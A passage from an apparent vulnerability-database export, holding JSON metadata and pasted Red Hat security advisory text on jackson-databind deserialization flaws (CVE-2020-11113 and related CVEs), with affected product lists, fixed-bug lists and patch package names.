"url": "https://access.redhat.com/security/cve/cve-2022-23307"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4104"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=appplatform\u0026version=7.4"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/t57mpjuw3ma6qgwzrtmchhmmpqnvkgfc/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/evv25fxl4fu5x6x5bsl7rlq7t6f65mra/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0216"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/solutions/6577421"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1299"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1297"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1296"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25704"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25704"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-42739"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0236"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36322"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-42739"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36322"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/3.11/upgrading/index.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0225"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27292"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0226"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27292"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37136"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-37137"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37137"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-37136"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-34429"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38153"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.streams\u0026version=2.0.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-34429"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0138"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38153"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-408213"
},
{
"db": "PACKETSTORM",
"id": "165636"
},
{
"db": "PACKETSTORM",
"id": "166673"
},
{
"db": "PACKETSTORM",
"id": "166676"
},
{
"db": "PACKETSTORM",
"id": "166677"
},
{
"db": "PACKETSTORM",
"id": "165711"
},
{
"db": "PACKETSTORM",
"id": "165652"
},
{
"db": "PACKETSTORM",
"id": "165651"
},
{
"db": "PACKETSTORM",
"id": "165564"
},
{
"db": "NVD",
"id": "CVE-2021-44832"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-408213",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165636",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166673",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166676",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166677",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165711",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165652",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165651",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165564",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-44832",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-12-28T00:00:00",
"db": "VULHUB",
"id": "VHN-408213",
"ident": null
},
{
"date": "2022-01-20T17:49:52",
"db": "PACKETSTORM",
"id": "165636",
"ident": null
},
{
"date": "2022-04-11T17:07:22",
"db": "PACKETSTORM",
"id": "166673",
"ident": null
},
{
"date": "2022-04-11T17:14:49",
"db": "PACKETSTORM",
"id": "166676",
"ident": null
},
{
"date": "2022-04-11T17:15:55",
"db": "PACKETSTORM",
"id": "166677",
"ident": null
},
{
"date": "2022-01-26T15:06:38",
"db": "PACKETSTORM",
"id": "165711",
"ident": null
},
{
"date": "2022-01-21T15:31:01",
"db": "PACKETSTORM",
"id": "165652",
"ident": null
},
{
"date": "2022-01-21T15:30:48",
"db": "PACKETSTORM",
"id": "165651",
"ident": null
},
{
"date": "2022-01-14T15:29:02",
"db": "PACKETSTORM",
"id": "165564",
"ident": null
},
{
"date": "2021-12-28T20:15:08.400000",
"db": "NVD",
"id": "CVE-2021-44832",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-08-09T00:00:00",
"db": "VULHUB",
"id": "VHN-408213",
"ident": null
},
{
"date": "2024-11-21T06:31:34.783000",
"db": "NVD",
"id": "CVE-2021-44832",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "166673"
},
{
"db": "PACKETSTORM",
"id": "166676"
},
{
"db": "PACKETSTORM",
"id": "166677"
}
],
"trust": 0.3
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2022-0216-06",
"sources": [
{
"db": "PACKETSTORM",
"id": "165636"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "code execution",
"sources": [
{
"db": "PACKETSTORM",
"id": "165636"
},
{
"db": "PACKETSTORM",
"id": "165711"
},
{
"db": "PACKETSTORM",
"id": "165652"
},
{
"db": "PACKETSTORM",
"id": "165651"
},
{
"db": "PACKETSTORM",
"id": "165564"
}
],
"trust": 0.5
}
}
VAR-202003-1785
Vulnerability from variot - Updated: 2026-03-09 21:11FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa). FasterXML jackson-databind contains an untrusted data deserialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Description:
Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and Business Optimizer for solving planning problems. It automates business decisions and makes that logic available to the entire business.
It is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.
NOTE: This advisory is an addendum to https://access.redhat.com/errata/RHBA-2020:1414 and is an informational advisory only, to clarify security fixes released therein. No code has been modified as part of this advisory. Description:
Red Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Summary:
This is a security update for JBoss EAP Continuous Delivery 19. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-18881 - Upgrade Undertow to 2.0.30.SP1 JBEAP-18974 - Upgrade snakeyaml to 1.26 JBEAP-18975 - Upgrade cryptacular to 1.2.4 JBEAP-18982 - Upgrade WildFly Core to 11.0.0.Final-redhat-00001 JBEAP-18983 - Upgrade Remoting JMX from 3.0.3 to 3.0.4 JBEAP-19041 - Upgrade WildFly Elytron to 1.11.3.Final JBEAP-19042 - Upgrade wildfly-core to 11.0.2.Final JBEAP-19076 - Upgrade resteasy from 3.11.0.Final to 3.11.1.Final JBEAP-19211 - Empty section Fixed CVEs in CD19 Release Notes
- Description:
Red Hat Data Grid is a distributed, in-memory, NoSQL datastore based on the Infinispan project.
This release of Red Hat Data Grid 7.3.7 serves as a replacement for Red Hat Data Grid 7.3.6 and includes bug fixes and enhancements, which are described in the Release Notes, linked to in the References section of this erratum. Solution:
To install this update, do the following:
- Download the Data Grid 7.3.7 server patch from the customer portal. See the download link in the References section. Back up your existing Data Grid installation. You should back up databases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes for patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):
1595621 - CVE-2017-7658 jetty: Incorrect header handling 1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass 1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230 1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain 1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability 1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain 1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1816216 - CVE-2020-11612 netty: compression/decompression codecs don't enforce limits on buffer allocation sizes 1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking 1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config 1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap 1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core 1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly 1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop 1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender
- The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Installation instructions are available from the Fuse 7.7.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/
- Bugs fixed (https://bugzilla.redhat.com/):
1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl 1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents 1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API 1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service 1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake 1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries 1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. 1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: rh-maven35-jackson-databind security update Advisory ID: RHSA-2020:1523-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2020:1523 Issue date: 2020-04-21 Cross references: 1822587 1822174 1822932 1822937 1822927 CVE Names: CVE-2020-10968 CVE-2020-10969 CVE-2020-11111 CVE-2020-11112 CVE-2020-11113 =====================================================================
- Summary:
An update for rh-maven35-jackson-databind is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch
- Description:
The jackson-databind package provides general data-binding functionality for Jackson, which works on top of Jackson core streaming API.
Security Fix(es):
-
jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider (CVE-2020-10968)
-
jackson-databind: Serialization gadgets in javax.swing.JEditorPane (CVE-2020-10969)
-
jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory (CVE-2020-11111)
-
jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider (CVE-2020-11112)
-
jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime (CVE-2020-11113)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime
- Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-10968 https://access.redhat.com/security/cve/CVE-2020-10969 https://access.redhat.com/security/cve/CVE-2020-11111 https://access.redhat.com/security/cve/CVE-2020-11112 https://access.redhat.com/security/cve/CVE-2020-11113 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXp7oOtzjgjWX9erEAQghsBAAk6mN7QOctoM4gV9BDkYybnwjFrgzSgQg LahdpBV7QmHQ/6rdhSlbE8sGCdrUwLJy1GvRS1PzvUY2IzLf8c0rtzcHrIiD1wWB N5kEBWiNgHOpuU4etwbR9gGsY7hhSvyxzTyRhHU36UQJqyNoc95DfbokqeAf8Ggp dfw20J8hsCkQ6OkvDCM6T9fY7jcbHdiD4jx8WSMn3bQS3o8zRf1JJlMPOqLnHM+J 998+RIzoJYqqdL7XNWPMopvR1yps2Xx+NTL4+2Vg8e+2KVxO+ksIu3EqRsCRD0wT 22iPNX3r8ETjWcfLGw0Imvc8RiRsCL7L4oa+cbIpnBdvsRr/yW8IYmvJmHwFTZlK +vIyYPAfSCLuHSktXEwZ9WDMeFsJfZr+zdVZ5MmOgvMAIqg+0RSE3VBlzmuAOMbv yNz6SPODozvMDPmW1OwLhtGsu1CigORIuTRcNSYwTkXVoAxFhWXK0sHuxc3h1ne0 x38Tgk1grF7xbBSfvJwFn0MfBhufg4+iUuFhte7mtuSu3gvjQ/qt01Oo11p8cW2m g6lX1NGEsUpEONf0NS+1hFSxWB4ex7ln98e5AqNWtLHt3S5OHzI67+/4dgl5xF7J PdLv4j8b1AqTV8wRX6pK59OeslYcPhYdMWHEbMSkQJ3WZFOILkyTm6HWer9kl3Yt 8yoMyLl6FBM= =n1if -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Relevant releases/architectures:
6Client-AMQ-Clients-2 - i386, noarch, x86_64 6ComputeNode-AMQ-Clients-2 - noarch, x86_64 6Server-AMQ-Clients-2 - i386, noarch, x86_64 6Workstation-AMQ-Clients-2 - i386, noarch, x86_64 7Client-AMQ-Clients-2 - noarch, x86_64 7ComputeNode-AMQ-Clients-2 - noarch, x86_64 7Server-AMQ-Clients-2 - noarch, x86_64 7Workstation-AMQ-Clients-2 - noarch, x86_64 8Base-AMQ-Clients-2 - noarch, x86_64
- Description:
Red Hat AMQ Clients enable connecting, sending, and receiving messages over the AMQP 1.0 wire transport protocol to or from AMQ Broker 6 and 7. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime 1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender 1851327 - CVE-2020-14307 wildfly: EJB SessionOpenInvocations may not be removed properly after a response is received causing Denial of Service 1853595 - CVE-2020-14297 wildfly: Some EJB transaction objects may get accumulated causing Denial of Service
- JIRA issues fixed (https://issues.jboss.org/):
ENTMQCL-1987 - AMQ Resource Adapter example project is incompatible with Maven 3.6 ENTMQCL-1988 - AMQ Resource Adapter example project does not run ENTMQCL-2070 - [jms] Log successful reconnects more prominently
7
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "ucosminexus application server",
"scope": null,
"trust": 1.6,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "ucosminexus service platform",
"scope": null,
"trust": 1.6,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.3"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "webcenter portal",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "webcenter portal",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications evolved communications application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.0.15"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.20"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.9.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.10.4"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "communications instant messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0.1.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications session report manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.0.2.25"
},
{
"_id": null,
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.5.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"_id": null,
"model": "autovue for agile product lifecycle management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.0"
},
{
"_id": null,
"model": "communications calendar server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0"
},
{
"_id": null,
"model": "ucosminexus service architect",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "ucosminexus application server-r",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "ucosminexus developer",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
